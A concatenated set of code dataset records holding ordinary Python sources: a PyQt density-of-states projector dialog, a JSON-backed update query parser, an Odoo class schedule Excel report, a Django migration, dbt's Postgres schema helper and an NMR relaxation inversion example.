self.atoms.addItems( self.doscar.atoms )\n\n self.verticalLayout_2.addWidget(self.atoms)\n \n self.label_4 = QLabel(Dialog)\n self.label_4.setObjectName(u\"label_4\")\n\n self.verticalLayout_2.addWidget(self.label_4)\n\n self.orbitals = checkableComboBox.CheckableComboBox(Dialog) \n self.orbitals.addItems( self.doscar.guiLabel )\n\n self.verticalLayout_2.addWidget(self.orbitals)\n \n self.label_5 = QLabel(Dialog)\n self.label_5.setObjectName(u\"label_5\")\n\n self.verticalLayout_2.addWidget(self.label_5)\n\n self.lineEdit = QLineEdit(Dialog)\n self.lineEdit.setObjectName(u\"lineEdit\")\n\n self.verticalLayout_2.addWidget(self.lineEdit)\n\n self.verticalSpacer = QSpacerItem(20, 40, QSizePolicy.Minimum, QSizePolicy.Expanding)\n\n self.verticalLayout_2.addItem(self.verticalSpacer)\n\n self.horizontalLayout_2 = QHBoxLayout()\n self.horizontalLayout_2.setObjectName(u\"horizontalLayout_2\")\n self.pushButton = QPushButton(Dialog)\n self.pushButton.setObjectName(u\"pushButton\")\n self.pushButton.clicked.connect(self.clickAddLine)\n\n self.horizontalLayout_2.addWidget(self.pushButton)\n\n# self.pushButton_2 = QPushButton(Dialog)\n# self.pushButton_2.setObjectName(u\"pushButton_2\")\n# self.pushButton_2.clicked.connect(self.clickRemoveLine)\n#\n# self.horizontalLayout_2.addWidget(self.pushButton_2)\n\n self.pushButton_3 = QPushButton(Dialog)\n self.pushButton_3.setObjectName(u\"pushButton_3\")\n self.pushButton_3.clicked.connect(self.close)\n\n self.horizontalLayout_2.addWidget(self.pushButton_3)\n\n\n self.verticalLayout_2.addLayout(self.horizontalLayout_2)\n\n\n self.horizontalLayout_3.addLayout(self.verticalLayout_2)\n\n\n self.retranslateUi(Dialog)\n\n 
QMetaObject.connectSlotsByName(Dialog)\n # setupUi\n\n def retranslateUi(self, Dialog):\n Dialog.setWindowTitle(QCoreApplication.translate(\"Projector\", u\"Projector\", None))\n self.label_ax.setText(QCoreApplication.translate(\"Dialog\", u\"Choose axis:\", None))\n self.label_3.setText(QCoreApplication.translate(\"Dialog\", u\"Project onto atoms:\", None))\n# self.label.setText(QCoreApplication.translate(\"Dialog\", u\"from:\", None))\n# self.label_2.setText(QCoreApplication.translate(\"Dialog\", u\"to:\", None))\n self.label_4.setText(QCoreApplication.translate(\"Dialog\", u\"Project onto orbitals\", None))\n self.label_5.setText(QCoreApplication.translate(\"Dialog\", u\"Line label:\", None))\n self.loadDoscar.setText(QCoreApplication.translate(\"Dialog\", \n u\"Load DOSCAR\", None))\n self.pushButton.setText(QCoreApplication.translate(\"Dialog\", u\"Add line\", None))\n# self.pushButton_2.setText(QCoreApplication.translate(\"Dialog\", u\"Remove line\", None))\n self.pushButton_3.setText(QCoreApplication.translate(\"Dialog\", u\"Close\", None))\n # retranslateUi\n\n\n def clickAddLine(self):\n self.linecounter += 1\n# atomlist = np.arange( self.spinBox.value()-1, self.spinBox_2.value() )\n atomlist = self.atoms.currentData()\n orblist = self.orbitals.currentData()\n mylabel = self.lineEdit.text()\n color = self.canvas.colors[self.linecounter]\n \n lines = []\n for axis in self.canvas.axes.flatten():\n for line in axis.get_lines():\n lines.append( line )\n for line in lines:\n if line.get_label() == mylabel:\n color = line.get_color()\n break\n\n self.canvas.axes[self.axn].plot(self.doscar.energy, self.doscar.projector(atomlist, orblist), \n color=color, label=mylabel)\n# self.canvas.axes[self.axn].legend(loc='best', prop={'size' : 20})\n# self.canvas.legend = self.canvas.fig.legend(loc='upper right',\n# prop={'size':20})\n self.canvas.draw()\n self.lineEdit.clear()\n\n\n def load(self):\n self.axn = int(self.axis.currentData()[0])\n self.doscar = self.canvas.doscar[ self.axn ]\n# def clickRemoveLine(self):\n# if ( self.linecounter > 0 ):\n# self.canvas.axes.get_legend().remove()\n# self.canvas.axes.lines.pop(self.linecounter)\n# self.canvas.axes.legend(loc='best')\n# self.canvas.draw()\n# self.linecounter -= 1\n\n\nclass AppProj(QDialog, Ui_Dialog):\n def __init__(self, canvas, parent=None):\n super(AppProj, self).__init__(parent)\n for dd in canvas.doscar: \n if dd.enableProjector: self.setupUi(self, canvas)\n break\n\n\n","sub_path":"ploos/ProjectorGUI.py","file_name":"ProjectorGUI.py","file_ext":"py","file_size_in_byte":7184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"274305277","text":"import re\nimport json\n\nfrom database.lockstatus import LockStatus\n\n\nclass Update:\n\n def strip_text(self,text):\n return re.sub(' +', ' ', text.strip())\n\n def update_row(self, username,dbname,query,logger,fname):\n check_lock = LockStatus().checklock(username)\n # create db copy\n src_fname = dbname + \"_Tables.txt\"\n dest_dname = dbname + \"_Tables_copy.txt\"\n if fname is None:\n filename = src_fname\n status = False\n else:\n filename = dest_dname\n status = True\n file1 = open(filename, \"r\")\n f1 = file1.read()\n file1.close()\n update_set_dict = {}\n dict_obj = json.loads(f1)\n is_update_query = False\n # query = \"UPDATE Player SET player_name = 'ABC', position = 'forward' WHERE team_id = '1';\"\n if re.split(\" \", query)[0].lower() == \"update\":\n is_update_query = True\n\n if is_update_query:\n # do operation\n 
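# The dialog above leans on the project-local checkableComboBox, whose
# currentData() must return the checked entries. A minimal PyQt5 stand-in
# with that contract -- a sketch of the assumed interface, not the actual
# ploos implementation:
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QStandardItemModel
from PyQt5.QtWidgets import QComboBox

class CheckableComboBox(QComboBox):
    def __init__(self, parent=None):
        super(CheckableComboBox, self).__init__(parent)
        self.setModel(QStandardItemModel(self))
        # toggle an item's check state when it is clicked in the popup
        self.view().pressed.connect(self._toggle_item)

    def _toggle_item(self, index):
        item = self.model().itemFromIndex(index)
        checked = item.checkState() == Qt.Checked
        item.setCheckState(Qt.Unchecked if checked else Qt.Checked)

    def addItems(self, texts):
        for text in texts:
            super(CheckableComboBox, self).addItem(text)
            item = self.model().item(self.count() - 1)
            item.setFlags(Qt.ItemIsUserCheckable | Qt.ItemIsEnabled)
            item.setCheckState(Qt.Unchecked)

    def currentData(self, role=Qt.DisplayRole):
        # list of checked entries, as ProjectorGUI expects
        return [self.model().item(i).text() for i in range(self.count())
                if self.model().item(i).checkState() == Qt.Checked]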
update_query_set_values = re.split(\",\",\n re.sub(\"[^A-Za-z0-9=,_]\", \" \",\n re.findall(r'set(.*?)where', query.lower())[0]))\n update_query_condition = re.split(\",\", re.sub(\"[^A-Za-z0-9=,_]\", \" \", re.split('where', query.lower())[1]))\n table_name = self.strip_text(re.findall(r'update(.*?)set', query.lower())[0].strip())\n\n for y in update_query_condition:\n list_condition_update = re.split(\"= |< |> |<= |>= \", y)\n key_to_search_for_update_condition = self.strip_text(list_condition_update[0])\n value_update_condition = self.strip_text(list_condition_update[1])\n\n for x in update_query_set_values:\n list_key_value_update = re.split(\"=\", x)\n key_to_search = self.strip_text(list_key_value_update[0])\n value_to_update = self.strip_text(list_key_value_update[1])\n update_set_dict[key_to_search] = value_to_update\n # search in dict for condition and perform updates\n\n print(\"Update Query Operation\")\n #print(update_set_dict)\n tables_info = dict_obj['Tables']\n #print(tables_info)\n for values in tables_info:\n if values.get(\"Table_name\") == table_name:\n print(\"found\")\n values_info = values['Table_columns']\n for inside_list_value in values_info:\n if inside_list_value.get(key_to_search_for_update_condition) == value_update_condition:\n #print(inside_list_value)\n inside_list_value.update(update_set_dict)\n\n #print(dict_obj)\n #print(values)\n #print('check')\n file1 = open(filename, \"w+\")\n f1 = file1.write(json.dumps(dict_obj))\n file1.close()\n return status","sub_path":"database/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":2986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"454002212","text":"# -*- coding: utf-8 -*-\nfrom datetime import datetime, timedelta\nfrom odoo import api, fields, models\nimport datetime\nclass ScheduleReport(models.AbstractModel):\n _name = 'report.jptip_core.class_list.xlsx'\n _inherit = 'report.report_xlsx.abstract'\n\n def generate_xlsx_report(self,workbook, data, env):\n time_interval = self.env['class_schedule.print'].search([('company_id', '=', self.env.user.company_id.id)],limit=1)\n start_date = time_interval.start_date\n end_date = time_interval.end_date\n class_data = self.env['class.timetable'].search([('date', '>=', start_date), ('date', '<=', end_date), ('company_id', '=', self.env.user.company_id.id)], order=\"class_name asc\")\n class_room = self.env['jptip.class.room'].search([('company_id','=',self.env.user.company_id.id)])\n format21 = workbook.add_format({'font_size': 10, 'align': 'center', 'text_wrap': 1, 'bold': True, 'top':1, 'left':1, 'right':1,'bottom':1})\n format22 = workbook.add_format({'font_size': 8, 'align': 'center', 'text_wrap': 1})\n format23 = workbook.add_format({'font_size': 12, 'align': 'vcenter', 'text_wrap': 1})\n format24 = workbook.add_format({'font_size': 10, 'align': 'center', 'text_wrap': 1, 'bold': True, 'top':2, 'left':2, 'right':2,'bottom':2})\n format23.set_align('center')\n format24.set_bg_color('gray')\n sheet = workbook.add_worksheet(u'%s 課表' % self.env.user.company_id.name[0:2])\n start_day = None\n end_day = None\n for line in class_data.sorted(key=lambda r: r.date, reverse=False):\n start_day = line.date\n break\n for line in class_data.sorted(key=lambda r: r.date, reverse=True):\n end_day = line.date\n break\n days = datetime.datetime.strptime(end_day, '%Y-%m-%d') - datetime.datetime.strptime(start_day, '%Y-%m-%d')\n delta = datetime.timedelta(days=1)\n j = 0\n for line in range(0, days.days + 1):\n 
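# The handler above pulls the SET and WHERE pieces apart with regular
# expressions. A small standalone trace of that parse on a sample statement,
# mirroring the expressions used in update_row (note that lowering the whole
# query also lowercases the stored values):
import re

query = "UPDATE Player SET player_name = 'ABC', position = 'forward' WHERE team_id = '1';"
set_part = re.findall(r'set(.*?)where', query.lower())[0]
pairs = re.split(",", re.sub("[^A-Za-z0-9=,_]", " ", set_part))
updates = {k.strip(): v.strip() for k, v in (re.split("=", p) for p in pairs)}
print(updates)  # {'player_name': 'abc', 'position': 'forward'}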
class_data_set = self.env['class.timetable'].search([('date', '=', start_day), ('company_id', '=', self.env.user.company_id.id)])\n if not class_data_set:\n continue\n i = 2\n sheet.merge_range(j, 0, j, len(class_room) + 1, '%s 教室班課表' % self.env.user.company_id.class_header, format21)\n j += 1\n sheet.write(j, i - 2, '日期', format24)\n sheet.write(j, i - 1, '時間', format24)\n for row in class_room.sorted(key=lambda r: r.name, reverse=False):\n sheet.write(j, i, row.name, format24)\n row.excel_location = i\n i += 1\n j += 1\n temp = j\n if datetime.datetime.strptime(start_day, '%Y-%m-%d').weekday() != 5 and datetime.datetime.strptime(start_day, '%Y-%m-%d').weekday() != 6:\n time_session = self.env['jt.time.session'].search([('SA_day','!=','1'),('SU_day','!=','1'),('company_id','=',self.env.user.company_id.id)])\n for row in time_session:\n for x in row.time_duration_ids:\n sheet.write(j,1, x.begin_time + '\\n' + ' ~ \\n' + x.end_time, format21)\n for y in class_data_set:\n if y.class_time_begin.begin_time == x.begin_time and y.class_time_begin.end_time == x.end_time:\n sheet.write(j, y.class_room.excel_location, y.class_name.course_id.name + '\\n' + y.course_seq + '\\n' + y.teacher.name if y.teacher else y.class_name.course_id.name + '\\n' + y.course_seq + '\\n', format22)\n j += 1\n sheet.merge_range(temp, 0, j - 1, 0, str(datetime.datetime.strptime(start_day, '%Y-%m-%d').month) + '/' + str(datetime.datetime.strptime(start_day, '%Y-%m-%d').day), format23)\n start_day = str(datetime.datetime.strptime(start_day, '%Y-%m-%d') + delta).replace(' 00:00:00', '')\n if datetime.datetime.strptime(start_day, '%Y-%m-%d').weekday() == 5 or datetime.datetime.strptime(start_day, '%Y-%m-%d').weekday() == 6:\n time_session = self.env['jt.time.session'].search([('SA_day','=','1'),('SU_day','=','1'),('company_id','=',self.env.user.company_id.id)])\n for row in time_session:\n for x in row.time_duration_ids:\n sheet.write(j,1, x.begin_time + '\\n' + ' ~ \\n' + x.end_time, format21)\n for y in class_data_set:\n if y.class_time_begin.begin_time == x.begin_time and y.class_time_begin.end_time == x.end_time:\n sheet.write(j, y.class_room.excel_location, y.class_name.course_id.name + '\\n' + y.course_seq + '\\n' + y.teacher.name if y.teacher else y.class_name.course_id.name + '\\n' + y.course_seq + '\\n', format22)\n j += 1\n sheet.merge_range(temp, 0, j - 1, 0, str(datetime.datetime.strptime(start_day, '%Y-%m-%d').month) + '/' + str(datetime.datetime.strptime(start_day, '%Y-%m-%d').day), format23)\n start_day = str(datetime.datetime.strptime(start_day, '%Y-%m-%d') + delta).replace(' 00:00:00', '')\n time_interval.unlink()","sub_path":"addons_jptip/jptip_core/report/class_schedule_report.py","file_name":"class_schedule_report.py","file_ext":"py","file_size_in_byte":5209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"427887932","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('track', '0002_auto_20140910_1824'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='track',\n name='file',\n ),\n migrations.AddField(\n model_name='track',\n name='album',\n field=models.ForeignKey(default=1, to='track.Album'),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='album',\n name='artist',\n field=models.ForeignKey(to='users.UserProxy'),\n ),\n 
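# The report loop above re-parses start_day with strptime at every step. The
# same day-by-day walk, including the weekday/weekend split used to pick the
# time sessions, is terser with date objects -- a sketch of the iteration
# pattern only, with illustrative dates:
import datetime

day = datetime.date(2018, 3, 1)
end_day = datetime.date(2018, 3, 7)
while day <= end_day:
    is_weekend = day.weekday() in (5, 6)  # 5=Saturday, 6=Sunday
    print(day.isoformat(), 'weekend' if is_weekend else 'weekday')
    day += datetime.timedelta(days=1)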
]\n","sub_path":"musicsite/track/migrations/0003_auto_20140913_1302.py","file_name":"0003_auto_20140913_1302.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"419444864","text":"\nfrom dbt.logger import GLOBAL_LOGGER as logger\n\nimport psycopg2\nimport logging\nimport time\nimport re\n\nSCHEMA_PERMISSION_DENIED_MESSAGE = \"\"\"\nThe user '{user}' does not have sufficient permissions to create the schema\n'{schema}'. Either create the schema manually, or adjust the permissions of\nthe '{user}' user.\"\"\"\n\nRELATION_PERMISSION_DENIED_MESSAGE = \"\"\"\nThe user '{user}' does not have sufficient permissions to create the model\n'{model}' in the schema '{schema}'. Please adjust the permissions of the\n'{user}' user on the '{schema}' schema. With a superuser account, execute the\nfollowing commands, then re-run dbt.\n\ngrant usage, create on schema \"{schema}\" to \"{user}\";\ngrant select, insert, delete on all tables in schema \"{schema}\" to \"{user}\";\"\"\"\n\nRELATION_NOT_OWNER_MESSAGE = \"\"\"\nThe user '{user}' does not have sufficient permissions to drop the model\n'{model}' in the schema '{schema}'. This is likely because the relation was\ncreated by a different user. Either delete the model \"{schema}\".\"{model}\"\nmanually, or adjust the permissions of the '{user}' user in the '{schema}'\nschema.\"\"\"\n\nREAD_PERMISSION_DENIED_ERROR = \"\"\"\nEncountered an error while executing model '{model}'.\n> {error}\nCheck that the user '{user}' has sufficient permissions to read from all\nnecessary source tables\"\"\"\n\n\nclass Column(object):\n def __init__(self, column, dtype, char_size):\n self.column = column\n self.dtype = dtype\n self.char_size = char_size\n\n @property\n def name(self):\n return self.column\n\n @property\n def quoted(self):\n return '\"{}\"'.format(self.column)\n\n @property\n def data_type(self):\n if self.is_string():\n return Column.string_type(self.string_size())\n else:\n return self.dtype\n\n def is_string(self):\n return self.dtype in ['text', 'character varying']\n\n def string_size(self):\n if not self.is_string():\n raise RuntimeError(\"Called string_size() on non-string field!\")\n\n if self.dtype == 'text' or self.char_size is None:\n # char_size should never be None. 
Handle it reasonably just in case\n return 255\n else:\n return int(self.char_size)\n\n def can_expand_to(self, other_column):\n \"\"\"returns True if this column can be expanded to the size of the\n other column\"\"\"\n if not self.is_string() or not other_column.is_string():\n return False\n\n return other_column.string_size() > self.string_size()\n\n @classmethod\n def string_type(cls, size):\n return \"character varying({})\".format(size)\n\n def __repr__(self):\n return \"\".format(self.name, self.data_type)\n\n\nclass Schema(object):\n def __init__(self, project, target):\n self.project = project\n self.target = target\n\n self.schema_cache = {}\n self.runtime_existing = self.query_for_existing(self.target.schema)\n\n def cache_table_columns(self, schema, table, columns):\n tid = (schema, table)\n\n if tid not in self.schema_cache:\n self.schema_cache[tid] = columns\n\n return tid\n\n def get_table_columns_if_cached(self, schema, table):\n tid = (schema, table)\n return self.schema_cache.get(tid, None)\n\n def get_schemas(self):\n existing = []\n results = self.execute_and_fetch(\n 'select nspname from pg_catalog.pg_namespace')\n return [name for (name,) in results]\n\n def create_schema(self, schema_name):\n target_cfg = self.project.run_environment()\n user = target_cfg['user']\n\n try:\n self.execute(\n 'create schema if not exists \"{}\"'.format(schema_name))\n except psycopg2.ProgrammingError as e:\n if \"permission denied for\" in e.diag.message_primary:\n raise RuntimeError(\n SCHEMA_PERMISSION_DENIED_MESSAGE.format(\n schema=schema_name, user=user))\n else:\n raise e\n\n def query_for_existing(self, schema):\n sql = \"\"\"\n select tablename as name, 'table' as type from pg_tables where schemaname = '{schema}'\n union all\n select viewname as name, 'view' as type from pg_views where schemaname = '{schema}' \"\"\".format(schema=schema) # noqa\n\n results = self.execute_and_fetch(sql)\n existing = [(name, relation_type) for (name, relation_type) in results]\n\n return dict(existing)\n\n def execute(self, sql):\n with self.target.get_handle() as handle:\n with handle.cursor() as cursor:\n try:\n logger.debug(\"SQL: %s\", sql)\n pre = time.time()\n cursor.execute(sql)\n post = time.time()\n logger.debug(\n \"SQL status: %s in %0.2f seconds\",\n cursor.statusmessage, post-pre)\n return cursor.statusmessage\n except Exception as e:\n self.target.rollback()\n logger.debug(\"Error running SQL: %s\", sql)\n logger.debug(\"rolling back connection\")\n raise e\n\n def execute_and_fetch(self, sql):\n with self.target.get_handle() as handle:\n with handle.cursor() as cursor:\n try:\n logger.debug(\"SQL: %s\", sql)\n pre = time.time()\n cursor.execute(sql)\n post = time.time()\n logger.debug(\n \"SQL status: %s in %0.2f seconds\",\n cursor.statusmessage, post-pre)\n data = cursor.fetchall()\n logger.debug(\"SQL response: %s\", data)\n return data\n except Exception as e:\n self.target.rollback()\n logger.debug(\"Error running SQL: %s\", sql)\n logger.debug(\"rolling back connection\")\n raise e\n\n def execute_and_handle_permissions(self, query, model_name):\n try:\n return self.execute(query)\n except psycopg2.ProgrammingError as e:\n error_data = {\"model\": model_name,\n \"schema\": self.target.schema,\n \"user\": self.target.user}\n if 'must be owner of relation' in e.diag.message_primary:\n raise RuntimeError(\n RELATION_NOT_OWNER_MESSAGE.format(**error_data))\n elif \"permission denied for\" in e.diag.message_primary:\n raise RuntimeError(\n 
RELATION_PERMISSION_DENIED_MESSAGE.format(**error_data))\n else:\n raise e\n\n def execute_without_auto_commit(self, sql, handle=None):\n if handle is None:\n handle = self.target.get_handle()\n\n cursor = handle.cursor()\n\n try:\n logger.debug(\"SQL: %s\", sql)\n pre = time.time()\n cursor.execute(sql)\n post = time.time()\n logger.debug(\n \"SQL status: %s in %0.2f seconds\",\n cursor.statusmessage, post-pre)\n return handle, cursor.statusmessage\n except Exception as e:\n self.target.rollback()\n logger.debug(\"Error running SQL: %s\", sql)\n logger.debug(\"rolling back connection\")\n raise e\n finally:\n cursor.close()\n\n def truncate(self, schema, relation):\n sql = ('truncate table \"{schema}\".\"{relation}\"'\n .format(schema=schema, relation=relation))\n logger.debug(\"dropping table %s.%s\", schema, relation)\n self.execute_and_handle_permissions(sql, relation)\n logger.debug(\"dropped %s.%s\", schema, relation)\n\n def drop(self, schema, relation_type, relation):\n sql = ('drop {relation_type} if exists \"{schema}\".\"{relation}\" cascade'\n .format(\n schema=schema,\n relation_type=relation_type,\n relation=relation))\n logger.debug(\"dropping %s %s.%s\", relation_type, schema, relation)\n self.execute_and_handle_permissions(sql, relation)\n logger.debug(\"dropped %s %s.%s\", relation_type, schema, relation)\n\n def sql_columns_in_table(self, schema_name, table_name):\n sql = (\"\"\"\n select column_name, data_type, character_maximum_length\n from information_schema.columns\n where table_name = '{table_name}'\"\"\"\n .format(table_name=table_name).strip())\n\n if schema_name is not None:\n sql += (\" AND table_schema = '{schema_name}'\"\n .format(schema_name=schema_name))\n\n return sql\n\n def get_columns_in_table(self, schema_name, table_name, use_cached=True):\n logger.debug(\"getting columns in table %s.%s\", schema_name, table_name)\n\n columns = self.get_table_columns_if_cached(schema_name, table_name)\n if columns is not None and use_cached:\n logger.debug(\"Found columns (in cache): %s\", columns)\n return columns\n\n sql = self.sql_columns_in_table(schema_name, table_name)\n results = self.execute_and_fetch(sql)\n\n columns = []\n for result in results:\n column, data_type, char_size = result\n col = Column(column, data_type, char_size)\n columns.append(col)\n\n self.cache_table_columns(schema_name, table_name, columns)\n\n logger.debug(\"Found columns: %s\", columns)\n return columns\n\n def rename(self, schema, from_name, to_name):\n rename_query = 'alter table \"{schema}\".\"{from_name}\" rename to \"{to_name}\"'.format(schema=schema, from_name=from_name, to_name=to_name) # noqa\n logger.debug(\n \"renaming model %s.%s --> %s.%s\",\n schema, from_name, schema, to_name)\n self.execute_and_handle_permissions(rename_query, from_name)\n logger.debug(\n \"renamed model %s.%s --> %s.%s\",\n schema, from_name, schema, to_name)\n\n def get_missing_columns(self, from_schema, from_table, to_schema,\n to_table):\n \"\"\"Returns dict of {column:type} for columns in from_table that are\n missing from to_table\"\"\"\n from_columns = {col.name: col for col in\n self.get_columns_in_table(from_schema, from_table)}\n to_columns = {col.name: col for col in\n self.get_columns_in_table(to_schema, to_table)}\n\n missing_columns = set(from_columns.keys()) - set(to_columns.keys())\n\n return [col for (col_name, col) in from_columns.items()\n if col_name in missing_columns]\n\n def create_table(self, schema, table, columns, sort, dist):\n fields = ['\"{field}\" {data_type}'.format(\n 
field=column.name, data_type=column.data_type\n ) for column in columns]\n fields_csv = \",\\n \".join(fields)\n dist = self.target.dist_qualifier(dist)\n sort = self.target.sort_qualifier('compound', sort)\n sql = 'create table if not exists \"{schema}\".\"{table}\" (\\n {fields}\\n) {dist} {sort};'.format(schema=schema, table=table, fields=fields_csv, sort=sort, dist=dist) # noqa\n logger.debug('creating table \"%s\".\"%s\"', schema, table)\n self.execute_and_handle_permissions(sql, table)\n\n def create_schema_if_not_exists(self, schema_name):\n schemas = self.get_schemas()\n\n if schema_name not in schemas:\n self.create_schema(schema_name)\n\n def alter_column_type(self, schema, table, column_name, new_column_type):\n \"\"\"\n 1. Create a new column (w/ temp name and correct type)\n 2. Copy data over to it\n 3. Drop the existing column (cascade!)\n 4. Rename the new column to existing column\n \"\"\"\n\n opts = {\n \"schema\": schema,\n \"table\": table,\n \"old_column\": column_name,\n \"tmp_column\": \"{}__dbt_alter\".format(column_name),\n \"dtype\": new_column_type\n }\n\n sql = \"\"\"\n alter table \"{schema}\".\"{table}\" add column \"{tmp_column}\" {dtype};\n update \"{schema}\".\"{table}\" set \"{tmp_column}\" = \"{old_column}\";\n alter table \"{schema}\".\"{table}\" drop column \"{old_column}\" cascade;\n alter table \"{schema}\".\"{table}\" rename column \"{tmp_column}\" to \"{old_column}\";\n \"\"\".format(**opts) # noqa\n\n status = self.execute(sql)\n return status\n\n def expand_column_types_if_needed(self, temp_table, to_schema, to_table):\n source_columns = {col.name: col for col in\n self.get_columns_in_table(None, temp_table)}\n dest_columns = {col.name: col for col in\n self.get_columns_in_table(to_schema, to_table)}\n\n for column_name, source_column in source_columns.items():\n dest_column = dest_columns.get(column_name)\n\n if dest_column is not None and \\\n dest_column.can_expand_to(source_column):\n new_type = Column.string_type(source_column.string_size())\n logger.debug(\"Changing col type from %s to %s in table %s.%s\",\n dest_column.data_type,\n new_type,\n to_schema,\n to_table)\n self.alter_column_type(\n to_schema, to_table, column_name, new_type)\n\n # update these cols in the cache! This is a hack to fix broken\n # incremental models for type expansion. 
TODO\n self.cache_table_columns(to_schema, to_table, source_columns)\n\n def table_exists(self, schema, table):\n if schema == self.target.schema:\n exists = self.runtime_existing.get(table) is not None\n return exists\n else:\n tables = self.query_for_existing(schema)\n exists = tables.get(table) is not None\n return exists\n","sub_path":"dbt/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":14070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"403360928","text":"\"\"\"\n0.10 Cs2O • 0.90 SiO2 MAS-ETA\n=============================\n\"\"\"\n\n# %%\n# The following example is an application of the statistical learning method in\n# determining the distribution of the Si-29 echo train decay constants in glasses.\n#\n# Import all relevant packages.\nimport csdmpy as cp\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom mrinversion.kernel import relaxation\nfrom mrinversion.linear_model import LassoFistaCV, TSVDCompression\nfrom csdmpy import statistics as stats\n\nplt.rcParams[\"pdf.fonttype\"] = 42 # For using plots in Illustrator\nplt.rc(\"font\", size=9)\n\n\ndef plot2D(csdm_object, **kwargs):\n plt.figure(figsize=(4, 3))\n csdm_object.plot(cmap=\"gist_ncar_r\", **kwargs)\n plt.tight_layout()\n plt.show()\n\n\n# sphinx_gallery_thumbnail_number = 4\n\n# %%\n# Dataset setup\n# -------------\n# Import the dataset\n# ''''''''''''''''''\n# Load the dataset as a CSDM data-object.\n\n# The 2D SE-PIETA MAS dataset in csdm format\ndomain = \"https://www.ssnmr.org/sites/default/files/mrsimulator\"\nfilename = f\"{domain}/MAS_SE_PIETA_10Cs_90Si_FT.csdf\"\ndata_object = cp.load(filename)\n\n# Inversion only requires the real part of the complex dataset.\ndata_object = data_object.real\nsigma = 1270.825 # data standard deviation\n\n# Convert the MAS dimension from Hz to ppm.\ndata_object.dimensions[0].to(\"ppm\", \"nmr_frequency_ratio\")\nplot2D(data_object)\n\n# %%\n# Prepping the data for inversion\n# '''''''''''''''''''''''''''''''\ndata_object = data_object.T\ndata_object_truncated = data_object[:, 1220:-1220]\nplot2D(data_object_truncated)\n\n# %%\n# Linear Inversion setup\n# ----------------------\n# Dimension setup\n# '''''''''''''''\ndata_object_truncated.dimensions[0].to(\"s\") # set coordinates to 's'\nkernel_dimension = data_object_truncated.dimensions[0]\n\n# %%\n# Generating the kernel\n# '''''''''''''''''''''\nrelaxT2 = relaxation.T2(\n kernel_dimension=kernel_dimension,\n inverse_dimension=dict(\n count=32,\n minimum=\"1e-3 s\",\n maximum=\"1e4 s\",\n scale=\"log\",\n label=r\"log ($\\lambda^{-1}$ / s)\",\n ),\n)\ninverse_dimension = relaxT2.inverse_dimension\nK = relaxT2.kernel(supersampling=20)\n\n# %%\n# Data Compression\n# ''''''''''''''''\nnew_system = TSVDCompression(K, data_object_truncated)\ncompressed_K = new_system.compressed_K\ncompressed_s = new_system.compressed_s\n\nprint(f\"truncation_index = {new_system.truncation_index}\")\n\n# %%\n# Solving the inverse problem\n# ---------------------------\n# FISTA LASSO cross-validation\n# '''''''''''''''''''''''''''''\n\n# setup the pre-defined range of alpha and lambda values\nlambdas = 10 ** (-4 + 5 * (np.arange(32) / 31))\n\n# setup the smooth lasso cross-validation class\ns_lasso = LassoFistaCV(\n lambdas=lambdas, # A numpy array of lambda values.\n sigma=sigma, # data standard deviation\n folds=5, # The number of folds in n-folds cross-validation.\n inverse_dimension=inverse_dimension, # previously defined inverse dimensions.\n)\n\n# run the 
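# The type expansion above hinges on Column.can_expand_to, which only ever
# widens string (varchar/text) columns. A quick illustration using the Column
# class defined at the top of this module (import path assumed from the
# file's location):
from dbt.schema import Column

dest = Column('email', 'character varying', 64)
src = Column('email', 'character varying', 255)
print(dest.can_expand_to(src))                 # True: both strings, 255 > 64
print(Column.string_type(src.string_size()))   # 'character varying(255)'
print(dest.can_expand_to(Column('id', 'integer', None)))  # False: non-string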
fit method on the compressed kernel and compressed data.\ns_lasso.fit(K=compressed_K, s=compressed_s)\n\n# %%\n# The optimum hyper-parameters\n# ''''''''''''''''''''''''''''\nprint(s_lasso.hyperparameters)\n\n# %%\n# The cross-validation curve\n# ''''''''''''''''''''''''''\nplt.figure(figsize=(4, 3))\ns_lasso.cv_plot()\nplt.tight_layout()\nplt.show()\n\n# %%\n# The optimum solution\n# ''''''''''''''''''''\nf_sol = s_lasso.f\n\nlevels = np.arange(15) / 15 + 0.1\nplt.figure(figsize=(3.85, 2.75)) # set the figure size\nax = plt.subplot(projection=\"csdm\")\ncb = ax.contourf(f_sol / f_sol.max(), levels=levels, cmap=\"jet_r\")\nax.set_ylim(-70, -130)\nax.set_xlim(-3, 2.5)\nplt.title(\"10Cs:90Si\")\nax.set_xlabel(r\"$\\log(\\lambda^{-1}\\,/\\,$s)\")\nax.set_ylabel(\"Frequency / ppm\")\nplt.grid(linestyle=\"--\", alpha=0.75)\nplt.colorbar(cb, ticks=np.arange(11) / 10)\nplt.tight_layout()\nplt.show()\n\n\n# %%\n# The fit residuals\n# '''''''''''''''''\nresiduals = s_lasso.residuals(K=K, s=data_object_truncated)\nplot2D(residuals)\n\n# %%\n# The standard deviation of the residuals is\nresiduals.std()\n\n# %%\n# Saving the solution\n# '''''''''''''''''''\nf_sol.save(\"10Cs-90Si_inverse.csdf\") # save the solution\nresiduals.save(\"10Cs-90Si_residue.csdf\") # save the residuals\n\n# %%\n# Analysis\n# --------\n\n# Normalize the distribution to 1.\nf_sol /= f_sol.max()\n\n# Get the Q4 and Q3 cross-sections.\nQ4_coordinate = -108.9e-6 # ppm\nQ3_coordinate = -98.6e-6 # ppm\nQ4_index = np.where(f_sol.dimensions[1].coordinates >= Q4_coordinate)[0][0]\nQ3_index = np.where(f_sol.dimensions[1].coordinates >= Q3_coordinate)[0][0]\n\nQ4_region = f_sol[:, Q4_index]\nQ3_region = f_sol[:, Q3_index]\n\n# %%\n# Plot of the Q4 and 